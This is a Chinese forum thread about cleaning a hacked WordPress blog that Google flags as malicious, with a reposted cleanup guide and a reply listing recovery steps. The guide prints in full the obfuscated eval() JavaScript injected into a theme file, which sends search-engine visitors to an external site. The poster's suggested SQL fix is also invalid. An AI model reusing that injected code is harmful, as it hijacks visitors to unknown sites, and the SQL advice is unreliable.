欢迎来到 偶看问答, 你可以在此提问和回复,和社区其他用户共同交流。

偶看问答是关于Wordpress、Joomla、SEO、网络营销和电子商务相关的问答互助社区。

上传图片的问题,可以使用免费图床 http://www1.freep.cn/ 上传后将图片地址插入编辑器即可。

如何解决浏览器报毒?

151 浏览

我独立博客可能被挂马了,我解决不了,等你有空看能不能帮我看一下。你银行帐号给我,你“网络营销问答”上的支付宝按钮没了。
13号我的独立博客一打开就显示“警告:此页面包含危险内容!”,
jrubbish.com 包含恶意软件。如果您访问此网站,您的计算机可能会中毒。
Google 发现如果您继续操作,您的计算机上可能会安装恶意软件。如果您以前访问过此网站或者您信任此网站,则此网站可能刚刚受到黑客攻击。您不应继续操作,建议您明天重试或者访问其他网站。
我们已通知 jrubbish.com 在网站上发现了恶意软件。有关在 jrubbish.com 上发现的问题的更多信息,请访问 Google 安全浏览诊断页面。
搜索“警告:此页面包含危险内容!”有很多很多帖子,
我自己查不到可疑文件或恶意代码,有一些在线检测病毒的网站,我不大熟悉。

我用网站管理员工具检查恶意软件一栏,显示如下:
Google 在您的网站上检测到了有害代码 ,因此当用户尝试通过 Google 搜索结果访问您的网页时,Google 会向他们显示警告。
请尽快 清理您的网站。
谷歌提示恶意软件

我这个博客夏天被钓鱼攻击过,收到邮件如下:
谷歌发送邮件

有空你就跟我要一下我ftp的帐号密码。我不止一个独立博客出现了这样的问题,可能是一些安全方面该注意的地方没注意。具体的再说吧。

网上找的一篇文章:《警告:此页面包含危险内容!wordpress网站被植入木马的解决办法》
原文地址:alonely.com.cn/Wordpress-Tech/20120610/4788.html

今天用google浏览器打开自己的一个网站的时候,被google浏览器提示报毒,没有发现我的网站有可以的地方,nnd,不知道的为什么就报毒了,以下是从网站找到的一些被植入木马的一些方法,自己尝试了所有这些方法但是都没用:

清除wordpress挂马代码:

先是登陆谷歌网站管理工具,在“故障诊断”下选择“恶意软件”进入存在问题的网址,随便点击一个有问题的网站,谷歌网站管理员工具就会给出“可疑的植入代码”
eval(function(p,a,c,k,e,r){e=f
unction(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?Strin
g.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,Str
ing)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e
]}];e=function(){return'w+'};c=1};while(c--)if(k[c])p=p.re
place(new RegExp('b'+e(c)+'b','g'),k[c]);return p}('e r=
x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3
("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g"
;4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.
3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c
"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6)
.o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr
er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|s
ubstring|split||||||ea|ht|tp|document|||go|window|location'.
split('|'),0,{}))
注:不要在浏览器中执行!

在被挂马博客当前主题的functions.php文件中的,找到与谷歌网站管理员工具给出的可疑的植入代码相同的代码,然后把整个php语句删除掉,我找到的整句代码如下:(蓝色部分)

然后保存文件。
注:不能确定的博主,可以拿出当前主题的备份主题的functions.php文件替换掉原来的。此外删除掉后,在谷歌网站管理员工具中申请审核,否则chrome浏览器还会报警告。

PS:我对挂马和代码这些了解不是很清楚,只是参照谷歌网站管理工具给出的相应的可疑植入代码进行清理,合理性有待考察。

1.重新安装wordpress,这是去除对wordpress核心文件(wp-config.php、wp-settings.php、主题的header.php
wordpress的wp-include的js)的修改
2.仔细检查主题目录,删除所有可疑文件
3.检查主题目录下的cache文件夹,最好全部清空,然后上传一个干净的index.html
4.检查wp-config.php,确保末尾没有恶意代码,一般恶意代码会加到1000多行,让你不注意就会忽略。
5. 检查你的服务器上是否有timthum.php文件,也可能叫thumb.php,如果有,请升级到最新版本,并禁用读取外部图片的功能。
6. 最好更新wordpress的数据库用户名密码,更新wordpress后台密码。
7. 都弄好了别忘了去google webmaster tool申请重新审核网站,将网站从blackllist中移除。

详情请看,http://wordpress.org.cn/thread-100870-1-1.html。

这个我觉得都会无效(基本都自己试过了),最后想到可能是数据库被注入了“******x.com”的内容,从而被谷歌抓取到了 。

幸福的是刚好我发现博客的一个文章内的图片链接是含有“*****.com”这个关键字的。然后果断把这个图片链接给删除了,更新文章。重新访问,就没有被谷歌浏览器提醒威胁了。

如果没有这么幸运,估计只有在MYSQL数据库里面用SQL语句来解决问题了。

SQL语句应该是 update database set “******.com”=””。万能的大仙,我已经一年多没有碰SQL了,应该木有记错吧。记错了要提醒我啊。

最新提问 1月 16, 2013 分类:网络相关 | 用户: 潇遥 偶看幼儿园 (550 分)
修改于 1月 18, 2013 用户:oukan

1个回答

wordpress博客被挂马的处理方式:

1.备份 wp-content/uploads 文件夹,主题如果没有修改过就无需备份,直接使用原版主题。必须详细检查 wp-content/uploads 所有的文件,把正在使用的插件名字记下。

2.检查数据库根据谷歌提示的语句搜索相关解决,并合理删除

3.删除网站目录文件,重新安装wordpress,一切重新配置并连接数据库

4.修改网站后台密码、FTP密码、空间管理密码、数据库连接密码、域名管理密码,甚至邮箱密码也要修改。

5.多个网站出现问题,如果不在同个服务器上,可以初步判断是本地电脑中病毒或木马了,对本地电脑执行一次彻底的检查,注意养成良好的上网习惯。

最新回答 1月 16, 2013 用户: oukan 偶看高中 (9,712 分)
©2005-2013 偶看博客 All Rights Reserved. 闽ICP备05029904号
...